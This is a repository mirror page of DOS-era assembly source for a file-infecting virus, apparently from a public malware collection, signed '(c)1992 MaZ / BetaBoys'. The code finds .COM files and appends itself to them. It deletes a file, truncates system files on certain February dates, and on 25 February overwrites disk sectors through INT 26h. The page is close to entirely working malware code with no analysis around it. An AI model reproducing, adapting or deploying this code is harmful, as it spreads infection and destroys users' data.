mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
222 lines
3.3 KiB
NASM
222 lines
3.3 KiB
NASM
|
seg_a segment byte public
|
||
|
assume cs:seg_a, ds:seg_a
|
||
|
|
||
|
|
||
|
org 100h
|
||
|
|
||
|
ww proc far
|
||
|
|
||
|
start:
|
||
|
jmp loc_2
|
||
|
db 12 dup (90h)
|
||
|
db 0CDh, 20h
|
||
|
loc_2:
|
||
|
jmp short loc_3
|
||
|
db 90h, 2Ah, 2Eh, 63h, 6Fh, 6Dh
|
||
|
db 00h, 00h
|
||
|
data_8 db 'C:\Command.Com', 0
|
||
|
db 'C:\Autoexec.Bat', 0
|
||
|
db 'C:\Config.Sys', 0
|
||
|
db '\win'
|
||
|
data_12 dw 6F64h
|
||
|
db 'ws\win.com'
|
||
|
db 00h,0E9h, 0Eh, 00h, 90h,0C8h
|
||
|
db 01h
|
||
|
loc_3:
|
||
|
mov bx,101h
|
||
|
mov ah,[bx]
|
||
|
mov bx,102h
|
||
|
mov al,[bx]
|
||
|
xchg al,ah
|
||
|
add ax,3
|
||
|
mov si,ax
|
||
|
mov ah,1Ah
|
||
|
lea dx,[si+2C8h]
|
||
|
add dx,6
|
||
|
int 21h
|
||
|
|
||
|
mov ah,4Eh
|
||
|
lea dx,[si+103h]
|
||
|
mov cx,6
|
||
|
int 21h
|
||
|
|
||
|
cmp ax,12h
|
||
|
je loc_7
|
||
|
lea dx,[si+10Ah]
|
||
|
jmp short loc_6
|
||
|
db 90h
|
||
|
loc_5:
|
||
|
mov ah,4Dh
|
||
|
int 21h
|
||
|
|
||
|
mov ah,4Fh
|
||
|
int 21h
|
||
|
|
||
|
cmp ax,12h
|
||
|
je loc_7
|
||
|
lea dx,[si+2C8h]
|
||
|
add dx,24h
|
||
|
loc_6:
|
||
|
mov ah,3Dh
|
||
|
mov al,2
|
||
|
int 21h
|
||
|
|
||
|
mov bx,ax
|
||
|
mov ah,42h
|
||
|
mov al,2
|
||
|
mov dx,0
|
||
|
mov cx,0
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
push ax
|
||
|
sub ax,6
|
||
|
mov dx,ax
|
||
|
mov ah,42h
|
||
|
mov al,0
|
||
|
mov cx,0
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
mov ah,3Fh
|
||
|
mov cx,1
|
||
|
lea dx,[si+14Bh]
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
mov ah,byte ptr data_8+30h[si]
|
||
|
cmp ah,42h
|
||
|
jne loc_8
|
||
|
jmp short loc_5
|
||
|
loc_7:
|
||
|
jmp short loc_9
|
||
|
db 90h
|
||
|
loc_8:
|
||
|
mov ah,42h
|
||
|
mov al,0
|
||
|
mov dx,0
|
||
|
mov cx,0
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
mov ax,3F00h
|
||
|
mov cx,3
|
||
|
lea dx,[si+2C8h]
|
||
|
add dx,3
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
mov ax,4200h
|
||
|
mov dx,0
|
||
|
mov cx,0
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
pop ax
|
||
|
sub ax,3
|
||
|
mov byte ptr data_8+2Eh[si],al
|
||
|
mov byte ptr data_8+2Fh[si],ah
|
||
|
mov ah,40h
|
||
|
mov cx,3
|
||
|
lea dx,[si+148h]
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
mov ax,4202h
|
||
|
mov dx,0
|
||
|
mov cx,0
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
mov ah,40h
|
||
|
lea dx,[si+100h]
|
||
|
mov cx,data_12[si]
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
mov ax,4000h
|
||
|
lea dx,[si+2C8h]
|
||
|
add dx,3
|
||
|
mov cx,3
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
jmp short loc_9
|
||
|
db 90h
|
||
|
loc_9:
|
||
|
mov ah,3Eh
|
||
|
int 21h
|
||
|
|
||
|
mov ah,41h
|
||
|
lea dx,[si+137h]
|
||
|
int 21h
|
||
|
|
||
|
mov ah,2Ah
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
cmp dh,2
|
||
|
jne loc_14
|
||
|
cmp dl,17h
|
||
|
je loc_10
|
||
|
cmp dl,18h
|
||
|
je loc_11
|
||
|
cmp dl,19h
|
||
|
je loc_12
|
||
|
jmp short loc_14
|
||
|
db 90h
|
||
|
loc_10:
|
||
|
mov ah,3Ch
|
||
|
lea dx,[si+119h]
|
||
|
mov cx,1
|
||
|
int 21h
|
||
|
|
||
|
jmp short loc_14
|
||
|
db 90h
|
||
|
loc_11:
|
||
|
mov ah,3Ch
|
||
|
lea dx,[si+129h]
|
||
|
mov cx,1
|
||
|
int 21h
|
||
|
|
||
|
jmp short loc_14
|
||
|
db 90h
|
||
|
loc_12:
|
||
|
mov al,2
|
||
|
loc_13:
|
||
|
mov cx,96h
|
||
|
mov dx,0
|
||
|
int 26h
|
||
|
|
||
|
|
||
|
|
||
|
inc al
|
||
|
cmp al,4
|
||
|
jne loc_13
|
||
|
loc_14:
|
||
|
mov cx,3
|
||
|
lea ax,[si+2C8h]
|
||
|
mov si,ax
|
||
|
mov di,100h
|
||
|
rep movsb
|
||
|
call sub_1
|
||
|
int 20h
|
||
|
|
||
|
ww endp
|
||
|
|
||
|
sub_1 proc near
|
||
|
mov di,offset start
|
||
|
jmp di
|
||
|
db 'Why Windows '
|
||
|
copyright db '(c)1992 MaZ / BetaBoys B.B'
|
||
|
db 90h, 90h, 90h
|
||
|
sub_1 endp
|
||
|
|
||
|
|
||
|
seg_a ends
|
||
|
|
||
|
|
||
|
|
||
|
end start
|
||
|
|